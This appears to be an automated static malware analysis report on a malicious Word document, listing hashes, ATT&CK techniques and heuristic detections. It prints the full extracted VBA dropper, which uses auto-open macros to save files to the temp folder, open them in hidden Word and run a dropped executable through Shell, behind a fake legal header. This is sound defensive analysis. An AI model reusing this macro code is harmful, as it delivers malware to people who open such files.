Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebf742b984166d60…

MALICIOUS

Office (OLE)

100.0 KB Created: 2015-11-03 07:55:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: d61a8d266d92f61dc53ac203b4dda4fe SHA-1: f9f4b9528e2f69a1c1a15c9588485459e49640f1 SHA-256: ebf742b984166d605523156751ae03c6d6ac101520014009b10f3c691765f061
594 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1137.001 Office Application Build: VBA T1204.002 Malicious File: User Execution T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to drop and execute an embedded PE executable. Specifically, the script attempts to save files to 'C:\Windows\Temp\' with names like '322.rtf', '311.rtf', and 'wa1.fxe', and then uses CreateObject to open one of these dropped files, likely to execute the embedded payload. The presence of CreateProcess, LoadLibrary, and GetProcAddress API calls further supports the execution of a secondary payload.

Heuristics 18

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim ssJHjksad As Variant
    ssJHjksad = Shell(njqbwdasd, 0)
    BVJKHKQWD = "askhdjk ashdklas *Yias jkdas"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Malfsad (2)
    Set mmmSdhjas = CreateObject("Word.Application")
    mmmSdhjas.Visible = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        HDUQGBANMSD = "^&GJHG ASKJD AJKSHD ASJdjsah ajkshd"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
    Sub Workbook_Open()
        POIOJAKSLD = "88a sdu hSAjk dgjsadhkjashd as"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Sunasay
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    SNP = _
    Environ$(SSBBDD) + BNJWDASDDD
    HUQS = "."
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2237 bytes
SHA-256: a75f8ccc91d1e66c3b34ac93ce28eea8ac3753bd256b88c93d544cf427007a00
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'==========================================================================================
' Legal
' Macros Software for system administrators for installing new software by sending
' doc files with macros for their client.
' Diverse Lynx LLC - USA
' (c) 2015 All rights reserved
' US Office 300 Alexander Park
' Suite #200
' Princeton, NJ 08540
' Using this macros is illegal for other companies!
'==========================================================================================

Sub AutoOpen()
    HDUQGBANMSD = "^&GJHG ASKJD AJKSHD ASJdjsah ajkshd"
    Mukaka
End Sub

Sub Mukaka()
    QWHDJKASDH = "12i391uu128937b1892 816312893"
    Sunasay
End Sub

Sub Sunasay()
Dim TEX As String, haa As Integer, HBDS As Date
BNJWDASDDD = "\"
SSBBDD = "TE"
haa = Sgn(-65 + CInt(Minute(Now)))
On Error Resume Next
SSBBDD = SSBBDD & "MP"
SNP = _
Environ$(SSBBDD) + BNJWDASDDD
HUQS = "."
FEFE = HUQS & Chr(102 + haa) + "xe"
DEDE = HUQS + "rt" & Chr(102)

TCA = SNP + "322" + DEDE
TCB = SNP + "311" + DEDE
TEX = SNP + "wa1" & "" + FEFE


MafDid (TCA)
MafDid (TCB)
Malfsad (2)
Set mmmSdhjas = CreateObject("Word.Application")
mmmSdhjas.Visible = False
mmmSdhjas.Documents.Open (TCA)
Malfsad (2)
HQUDHSA = Faktal(TEX)
Malfsad (1)
mmmSdhjas.Quit
Set mmmSdhjas = Nothing
End Sub
Public Function MafDid(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Workbook_Open()
    POIOJAKSLD = "88a sdu hSAjk dgjsadhkjashd as"
    Sunasay
End Sub

Sub Malfsad(Lotosd As Long)
Dim Massdn As Long
Massdn = Timer + Lotosd
Do While Timer < Massdn
DoEvents
Loop
AAJHKBMN = "asdjlak s)_ ias dj"
End Sub

Public Function Faktal(njqbwdasd As String)
Dim ssJHjksad As Variant
ssJHjksad = Shell(njqbwdasd, 0)
BVJKHKQWD = "askhdjk ashdklas *Yias jkdas"
End Function

Sub Auto_Open()
    Sunasay
    AAKJQWKNDASD = "8asdyi ashkasj"
End Sub
embedded_office_00004c53.exe embedded-pe Office MZ+PE at offset 0x4C53 82865 bytes
SHA-256: 2621d5bc20f04442e0a8e467fcce2b838d8b6445d5e974ac296b9de1ab92d859
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1508069919/Ole10Native 60635 bytes
SHA-256: ae67e77f590dca2e23f7d388b01c7c16654c26a7b0f38408e6e9f926572e13dd